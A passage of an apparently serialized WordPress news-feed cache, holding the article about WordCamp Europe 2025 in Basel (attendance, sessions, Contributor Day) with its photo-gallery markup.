support</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18872\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WCEU 2025: A Community Celebration in the Swiss Sun\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://wordpress.org/news/2025/06/wceu-2025-a-community-celebration-in-the-swiss-sun/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 07 Jun 2025 19:19:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"WCEU\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18776\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:362:\"Over 1,723 attendees from 84 countries gathered at the Messe and Congress Center Basel in Switzerland, and 20,353 more joined online for WordCamp Europe 2025. I’m personally very excited&#8230; There’s so much I want to do. I think there’s a clear pathway to 7.0 and beyond. Matt Mullenweg, WordPress Cofounder The flagship WordPress event kicked [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brett McSherry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:61400:\"\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18837\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0151-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><figcaption class=\"wp-element-caption\"><em>Photo by Nilo Velez</em></figcaption></figure>\n\n\n\n<p>Over 1,723 attendees from 84 countries gathered at the Messe and Congress Center Basel in Switzerland, and 20,353 more joined online for WordCamp Europe 2025.</p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-6c531013 wp-block-group-is-layout-flex\">\n<figure class=\"wp-block-pullquote\"><blockquote><p>I’m personally very excited&#8230; There’s so much I want to do. I think there’s a clear pathway to 7.0 and beyond.</p><cite>Matt Mullenweg, WordPress Cofounder</cite></blockquote></figure>\n</div>\n\n\n\n<p>The flagship WordPress event kicked off in Basel, Switzerland, with a dedicated Contributor Day. It was followed by two days of engaging talks, panels, hands-on workshops, and vibrant community connections. WordPress Cofounder Matt Mullenweg and Executive Director Mary Hubbard joined a diverse lineup of speakers and panelists, sharing insights in the heart of one of Europe’s most charming cities.</p>\n\n\n\n<p>Set against the backdrop of Basel’s historic streets and Rhine-side views, the sponsor hall buzzed with activity as companies from across the WordPress ecosystem showcased their latest innovations, offered live demos, and connected with attendees. Each day, participants refueled with a range of local and international cuisine — from Swiss specialties to global favorites — making mealtime a lively space for networking, collaboration, and sparking new ideas.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A Global Gathering in Basel</h2>\n\n\n\n<p>WordCamp Europe has long been one of the most anticipated WordPress events of the year — a space where community, creativity, and collaboration thrive. This year in Basel, the conference delivered an exciting and diverse program that reached every corner of the WordPress ecosystem.</p>\n\n\n\n<p>Here’s what attendees experienced:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Engaging Sessions Across Tracks</strong> &#8211; Across two full days, the conference featured informative talks, captivating keynotes, and dynamic discussions exploring WordPress and the broader web.</li>\n\n\n\n<li><strong>A Global Speaker Lineup</strong> &#8211; The stage welcomed 52 speakers from 23 countries across five continents, each bringing unique insights and global perspectives.</li>\n\n\n\n<li><strong>Wide-Ranging Topics</strong> &#8211; The schedule included 45 sessions and four hands-on workshops across three tracks, covering:\n<ul class=\"wp-block-list\">\n<li>Accessibility and key policy updates like the European Accessibility Act and the Cyber Resilience Act</li>\n\n\n\n<li>The evolving role of Artificial Intelligence in the open web</li>\n\n\n\n<li>Cutting-edge web design, development best practices, SEO, and content strategy</li>\n\n\n\n<li>Real-world case studies and showcases from across the community</li>\n</ul>\n</li>\n\n\n\n<li><strong>Hands-On Learning Opportunities</strong> &#8211; Interactive workshops allowed attendees to roll up their sleeves and develop practical skills in a collaborative setting.</li>\n\n\n\n<li><strong>A Community Built on Collaboration</strong> &#8211; Whether developer, designer, content creator, or entrepreneur, every attendee found space to connect, learn, and grow within a vibrant and welcoming community.</li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Contributor Day</h2>\n\n\n\n<p>WordCamp Europe began with a vibrant Contributor Day that brought together 640 contributors—including many first-timers—to collaborate, share knowledge, and support the WordPress project. Guided by 33 dedicated table leads, with 21 teams, attendees of all experience levels came together to exchange ideas, solve real challenges, and make meaningful contributions to open source. From accessibility improvements to theme development and translation efforts, every table played a part in moving WordPress forward.</p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped has-black-background-color has-background wp-block-gallery-3 is-layout-flex wp-block-gallery-is-layout-flex\" style=\"border-width:20px;border-radius:2px\">\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d35369596ca&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d35369596ca\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18798\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18798\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568125707_c7f1d5c4a2_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d35369599bb&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d35369599bb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18799\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18799\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568126032_465e58f52e_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Jeroen Rotty</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d3536959c86&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d3536959c86\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18800\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18800\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568127677_4608e6c2e5_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695a0f6&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695a0f6\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18801\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18801\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568995131_a2b3103540_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Roan de Vries</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695a3f8&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695a3f8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18802\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-18802\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?resize=1536%2C864&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54568997316_388cdfd4e5_k-1.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695a6bb&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695a6bb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18803\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18803\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219743_6bc7238ce1_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Nilo Velez</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695a980&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695a980\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18804\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18804\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569219883_c2df21a0cb_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695ac2f&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695ac2f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18805\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18805\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220458_b2cc7018a6_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Levente András Tóth</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695aeeb&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695aeeb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18806\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18806\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, 